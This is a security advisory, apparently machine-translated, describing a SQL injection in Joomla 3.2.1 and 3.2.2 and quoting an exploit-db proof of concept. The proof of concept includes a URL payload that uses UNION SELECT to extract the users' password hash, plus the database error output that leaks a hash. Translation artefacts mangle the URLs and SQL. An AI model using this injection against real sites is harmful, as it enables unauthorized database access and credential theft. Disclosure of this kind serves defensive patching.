Joomla! 'Index. php' SQL Injection Vulnerability

Release date:
Updated on:

Affected Systems:
Joomla! Joomla! 3.2.2
Joomla! Joomla! 3.2.1
Description:
--------------------------------------------------------------------------------
Joomla! Is an Open Source Content Management System (CMS ).

Joomla 3.2.1 and 3.2.2 modules/mod_tags_similar/helper. the ModTagssimilarHelper: getList () method in the php script does not properly filter user input. This allows remote attackers to inject or operate SQL queries in the backend database.
 
<* Source: killall-9

Link: http://osvdb.org/show/osvdb/103126
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit Title: Joomla 3.2.1 SQL injection
# Date: 05/02/2014
# Exploit Author: kiall-9@mail.com
# Vendor Homepage: http://www.joomla.org/
# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip
# Version: 3.2.1 (default installation with Test sample data)
# Tested on: Virtualbox (debian) + apache
POC =>
Http: // localhost/Joomla_3.2.1/index. php/weblinks-categories? Id = \

Will cause an error:

1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\) 'At line 3 SQL = SELECT 'T '. 'id' FROM 'k59cv _ tags' AS t inner join 'k59cv _ contentitem_tag_map 'AS m ON 'M '. 'tag _ id' = 'T '. 'id' AND 'M '. 'Type _ alias' = 'com _ weblinks. categories 'AND 'M '. 'content _ item_id 'IN (\) Array ([type] => 8 [message] => Undefined offset: 0 [file] =>/var/www/Joomla_3.2.1/libraries/joomla/filter/input. php [line] = & gt; 203)

I modified the original error. php file with this code --- <? Php print_r (error_get_last ();?> --- In order to obtain something useful .;-)

Now I can easily exploit this flaw:

Http: // localhost/Joomla_3.2.1/index. php/weblinks-categories? Id = 0% 20% 29% 20 union % 20 select % 20 password % 20 from % 20% 60k59cv_users % 60% 20 -- % 20% 29
And obtain the hash:

1054 Unknown column '$ P $ D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause 'SQL = SELECT 'M '. 'tag _ id', 'M '. 'Core _ content_id ', 'M '. 'content _ item_id ', 'M '. 'Type _ alias', COUNT ('tag _ id') AS 'Count', 'T '. 'access', 'T '. 'id', 'ct '. 'router ', 'cc '. 'Core _ title', 'cc '. 'Core _ alias', 'cc '. 'Core _ catid', 'cc '. 'Core _ language' FROM 'k59cv _ contentitem_tag_map 'AS 'M' inner join 'k59cv _ tags' AS 'T' ON m. tag_id = t. id inner join 'k59cv _ ucm_content 'AS 'cc' ON m. core_content_id = cc. core_content_id inner join 'k59cv _ content_types 'AS 'ct' ON m. type_alias = ct. type_alias WHERE 'M '. 'tag _ id' IN ($ P $ D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t. access IN (1, 1) AND ('M '. 'content _ item_id '<> 0) union select password from 'k59cv _ users' --) OR 'M '. 'Type _ alias' <> 'com _ weblinks. categories ') AND 'cc '. 'Core _ state' = 1 group by 'M '. 'Core _ content_id 'order BY 'Count' desc limit 0, 5

CheerZ>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Joomla!
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://developer.joomla.org/security/

Refer:
 
EDB-31459
URL: http://developer.joomla.org/security/578-20140301-core-sql-injection.html